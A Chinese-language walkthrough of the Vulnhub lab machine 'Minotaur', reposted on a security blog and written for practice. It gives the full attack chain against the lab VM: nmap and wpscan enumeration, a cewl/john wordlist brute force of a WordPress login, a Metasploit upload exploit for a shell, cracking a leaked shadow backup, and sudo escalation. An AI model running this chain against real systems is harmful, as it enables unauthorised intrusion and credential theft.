记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

【Vulnhub】SecTalks: BNE0x00 - Minotaur

2020-09-16 12:53


扫不到 IP 按照之前的方法,但是这里是 dhcp 被注释掉了

把那些白的删掉,箭头指向的那一行的注释去掉



nmap -p- -A 192.168.149.196



ftp 匿名登录进去啥都没有



80 端口有个 apache 的默认页面

然后扫描目录扫出来一个 bull,访问是一个 wordpress 的博客,扫描一波,出来个用户名 bully

wpscan --url http://192.168.149.196/bull/ -eu



然后爆破一下(字典用 cewl 获取页面上的内容)

cewl -w words.txt -m 6 http://192.168.149.196/bull/

-m 这个参数指定的是长度

john --wordlist=words.txt --rules --stdout > words-john.txt

john 处理一下,生成一些组合出来的


wpscan --url http://192.168.149.196/bull/ --passwords ./words-john.txt -U bully

然后用组合出来的字典跑出来 bully 账户密码为 Bighornedbulls



然后可以用 msf 直接来拿 shell

use exploit/unix/webapp/wp_slideshowgallery_upload
set RHOST 192.168.149.196
set TARGETURI /bull/
set WP_USER bully
set WP_PASSWORD Bighornedbulls


在 /var/www/html 目录下有个 flag

/tmp 目录下也有,同时还有个 shadow.bak



保存出来用 john 暴力跑一下,得到:



切换用户 heffer 在用户目录得到一个 flag



切换 minotaur 同样在用户目录得到一个 flag

用 sudo -l 查看一下发现可以用 sudo 执行任意的命令?



知识来源: https://mp.weixin.qq.com/s?__biz=MzU5OTU3NDEzOQ==&mid=2247487346&idx=1&sn=e7e48d1958aa801e6a69daf0062b8af3

阅读:7581 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“【Vulnhub】SecTalks: BNE0x00 - Minotaur”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云

本页关键词